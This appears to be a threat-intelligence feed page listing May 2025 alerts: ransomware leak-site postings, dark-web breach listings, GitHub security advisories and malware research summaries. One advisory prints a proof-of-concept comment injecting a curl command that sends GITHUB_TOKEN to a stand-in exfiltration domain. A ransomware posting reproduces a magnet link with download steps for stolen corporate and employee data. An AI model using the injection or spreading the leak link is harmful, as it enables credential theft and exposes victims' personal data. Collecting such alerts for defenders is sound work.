CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!

Threat and Vulnerability Intelligence Database

RSS Feed

Example Searches:

Description: Alleged sale of unauthorized access to a Magento 1-based online store in USA
Source: DarkWebInformer
May 28th, 2025 (21 days ago)
Description: High Grade Materials is a Michigan-based company specializing in concrete and concrete-related products. We are going to upload about 20 GB of corporate data. A lot of em ployee information (DOB, passport number, address, phone and so o n), detailed financial data (audits, payment details, reports, in voices), contracts and agreements, death/birth certificates, NDAs , etc.
Source: Ransomware.live
May 28th, 2025 (21 days ago)
Description: The company creates personal care products and cosmetic s. Here is the access to 25 GB of corporate data. Lots of projects files, detailed financial data, information ab out all clients, contracts, correspondence, a bit of em ployee personal documents, and a lot of other data of s uch brands as Nelly, Yunsey and Fresh feel cosmetics. We have made the process of downloading company data as simple as possible for our users. All you need is any torrent client (like Vuze, Utorrent, qBittorrent or Tra nsmission to use magnet links). You will find the torre nt file above. Open uTorrent, or any another torrent client. Add torrent file or paste the magnet URL to upload the data safely. Archives have no password. MAGNET URL: magnet:?xt=urn:btih:608838B7636014D269C7DD03B34AE5F28A1 F8A88&dn=laboratoriosbelloch.com&tr=udp://tracker.openb ittorrent.com:80/announce&tr=udp://tracker.opentrackr.o rg:1337/announce
Source: Ransomware.live
May 28th, 2025 (21 days ago)
Description: Summary Using Issue_comment on .github/workflows/scalafmt-fix.yml an attacker can inject malicious code using github.event.comment.body. By exploiting the vulnerability, it is possible to exfiltrate high privileged GITHUB_TOKEN which can be used to completely overtake the repo since the token has content privileges. In addition ,it is possible to exfiltrate also the secret: BROADBOT_GITHUB_TOKEN Details The Issue_comment in GitHub Actions might be an injection path if the variable isn't handle as it should. In the following step it's vulnerable because it directly interpolates untrusted user input into a shell script. - name: Check for ScalaFmt Comment id: check-comment run: | if [[ "${{ github.event_name }}" == "issue_comment" && "${{ github.event.comment.body }}" == *"scalafmt"* ]]; then echo "::set-output name=comment-triggered::true" else echo "::set-output name=comment-triggered::false" fi In this case, it is possible to exfiltrate GITHUB_TOKEN and BROADBOT_GITHUB_TOKEN secrets. PoC To exploit the vulnerability an attacker can just drop a comment to any issue formed in the following way to exploit the vulnerability in the workflow .github/workflows/update_pylon_issue.yml. test" == "test" ]]; then & curl -s -d "$B64_BLOB" "https://$YOUR_EXFIL_DOMAIN/token" > /dev/null # To prove this is possible, we created an issue and we added a comment with the malicious code to extract the GITHUB_T...
Source: Github Advisory Database (Actions)
May 28th, 2025 (21 days ago)
Description: Alleged Data Breach of Universidad Pedagógica Experimental Libertador (UPEL)
Source: DarkWebInformer
May 28th, 2025 (21 days ago)
Description: Impact All objects for which an object-management configuration exists can be listed, viewed, edited, created or deleted by unauthorised users. If object-urls are exposed via other channels, the contents of these objects can be viewed independent of object-management configurations. Attack requirements The following conditions have to be met in order to perform this attack: A user must be logged in No relevant application roles are required At least one object-type must be configured via object-management The scope of the attack is limited to objects that are configured via object-management. The value of showInDataMenu is irrelevant for this attack Patches No patch is available yet Workarounds It is possible to override the endpoint security as defined in ObjectenApiHttpSecurityConfigurer and ObjectManagementHttpSecurityConfigurer. Depending on the implementation, this could result in loss of functionality. References https://github.com/valtimo-platform/valtimo-backend-libraries/security/advisories/GHSA-965r-9cg9-g42p https://github.com/advisories/GHSA-965r-9cg9-g42p
Source: Github Advisory Database (Maven)
May 28th, 2025 (21 days ago)
Description: Impact All objects for which an object-management configuration exists can be listed, viewed, edited, created or deleted by unauthorised users. If object-urls are exposed via other channels, the contents of these objects can be viewed independent of object-management configurations. Attack requirements The following conditions have to be met in order to perform this attack: A user must be logged in No relevant application roles are required At least one object-type must be configured via object-management The scope of the attack is limited to objects that are configured via object-management. The value of showInDataMenu is irrelevant for this attack Patches No patch is available yet Workarounds It is possible to override the endpoint security as defined in ObjectenApiHttpSecurityConfigurer and ObjectManagementHttpSecurityConfigurer. Depending on the implementation, this could result in loss of functionality. References https://github.com/valtimo-platform/valtimo-backend-libraries/security/advisories/GHSA-965r-9cg9-g42p https://github.com/advisories/GHSA-965r-9cg9-g42p
Source: Github Advisory Database (Maven)
May 28th, 2025 (21 days ago)
Description: Impact When the Contrast initializer is configured with a CONTRAST_LOG_LEVEL of info or debug, the workload secret is logged to stderr and written to Kubernetes logs. Since info is the default setting, this affects all Contrast installations that don't customize their initializers' log level. The following audiences are intended to have access to workload secrets (see https://docs.edgeless.systems/contrast/1.7/architecture/secrets#workload-secrets): Contrast Coordinator (can derive all workload secrets) Contrast Initializer (obtains only the secret configured in the manifest) Seedshare owner (can derive all workload secrets) Workload owner (can update manifests to obtain secrets) This vulnerability allows the following parties unintended access to workload secrets issued by a Coordinator: Kubernetes users with get or list permission on pods/logs. Others with read access to the Kubernetes log storage (most notably, the cloud provider). This vulnerability does not affect scenarios where workload secrets are not used by the application (directly or with secure persistence). Applications designed for workload owner exclusion can't use workload secrets and are thus unaffected. Patches N/A Workarounds This vulnerability can be mitigated by adding an environment variable CONTRAST_LOG_LEVEL=warn to the initializer after running contrast generate, and then running contrast generate again. References N/A References https://github.com/edgelesssys/contrast/security/advisories/GH...
Source: Github Advisory Database (Go)
May 28th, 2025 (21 days ago)
Description: Written by: Patrick Whitsell Google Threat Intelligence Group’s (GTIG) mission is to protect Google’s billions of users and Google’s multitude of products and services. In late October 2024, GTIG discovered an exploited government website hosting malware being used to target multiple other government entities. The exploited site delivered a malware payload, which we have dubbed “TOUGHPROGRESS”, that took advantage of Google Calendar for command and control (C2). Misuse of cloud services for C2 is a technique that many threat actors leverage in order to blend in with legitimate activity.  We assess with high confidence that this malware is being used by the PRC based actor APT41 (also tracked as HOODOO). APT41’s targets span the globe, including governments and organizations within the global shipping and logistics, media and entertainment, technology, and automotive sectors.  Overview In this blog post we analyze the malware delivery methods, technical details of the malware attack chain, discuss other recent APT41 activities, and share indicators of compromise (IOCs) to help security practitioners defend against similar attacks. We also detail how GTIG disrupted this campaign using custom detection signatures, shutting down attacker-controlled infrastructure, and protections added to Safe Browsing. Figure 1: TOUGHPROGRESS campaign overview ...
Source: Google Threat Intelligence
May 28th, 2025 (21 days ago)
Description: Cybersecurity researchers have discovered a security flaw in Microsoft's OneDrive File Picker that, if successfully exploited, could allow websites to access a user's entire cloud storage content, as opposed to just the files selected for upload via the tool. "This stems from overly broad OAuth scopes and misleading consent screens that fail to clearly explain the extent of access being granted,
Source: TheHackerNews
May 28th, 2025 (21 days ago)